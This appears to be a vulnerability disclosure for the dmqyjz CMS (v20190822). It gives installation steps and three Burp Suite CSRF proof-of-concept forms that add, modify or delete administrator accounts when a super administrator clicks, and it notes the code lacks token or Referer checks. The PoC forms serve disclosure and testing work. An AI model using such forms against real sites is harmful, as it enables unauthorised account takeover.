This CMS can be downloaded from here.

1. Install

First create a database you can choose any name.Here I create a database named dm.

1	create database dm;

Second import data into database you created just now.You can import with PHPMyAdmin or mysql command. I use mysql command to import data.

1	mysql -uroot -ppassword dm < import.sql

Ps.inmport.sql is in dmqyjz_v20190822/.

Then visithttp://localhsot/dmqyjz_v20190822/install.php.

Enter your Domain Name, Database Name, MySQL Username, MySQL Password.

And if your MySQL version is higher than 5.5 choose 是, or choose 否.

Click 开始配置 to install.

If you saw this page, it means you install this CMS successfully.

2. Log in as Super Administrator

Visit http://localhost/dmqyjz_v20190822/admindm-yourname/g.php

3. Description

After logged in as super administrator, open the following three pages.

CSRF-1

This CSRF-POC can add a normal administartor named test7 if a super administrator click the button.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn&file=add&act=insert" method="POST">
      <input type="hidden" name="name" value="test7" />
      <input type="hidden" name="Submit" value="æ&#143;&#144;äº&#164;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF-2

This CSRF-POC can edit a normal administrator’s password and permissions if a super administrator click the button.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php?lang=cn&file=edit&act=update&tid=107" method="POST">
      <input type="hidden" name="email" value="test7" />
      <input type="hidden" name="password" value="123" />
      <input type="hidden" name="userprevi&#91;&#93;" value="cate20150805&#95;1125344029" />
      <input type="hidden" name="userprevi&#91;&#93;" value="cate20150805&#95;1133251007" />
      <input type="hidden" name="userprevi&#91;&#93;" value="cate20160410&#95;0658287350" />
      <input type="hidden" name="userprevi&#91;&#93;" value="cate20190417&#95;1811131418" />
      <input type="hidden" name="userprevi&#91;&#93;" value="cate20190423&#95;1717461277" />
      <input type="hidden" name="userprevi&#91;&#93;" value="cate20190425&#95;1847297732" />
      <input type="hidden" name="user&#95;stanoaccess" value="n" />
      <input type="hidden" name="Submit" value="ä&#191;&#174;æ&#148;&#185;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF-3

This CSRF-POC can delete a normal administrator if a super administrator click the button.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/dmqyjz_v20190822/admindm-yourname/mod_account/mod_user.php">
      <input type="hidden" name="lang" value="cn" />
      <input type="hidden" name="act" value="deluser" />
      <input type="hidden" name="tid" value="107" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Analzy

CSRF-1

Add normal administrator

Code

CSRF-2

Edit normal administrator’s password

Code

CSRF-3

Delete normal administrtor

Code

All codes didn’t check Token or Referer.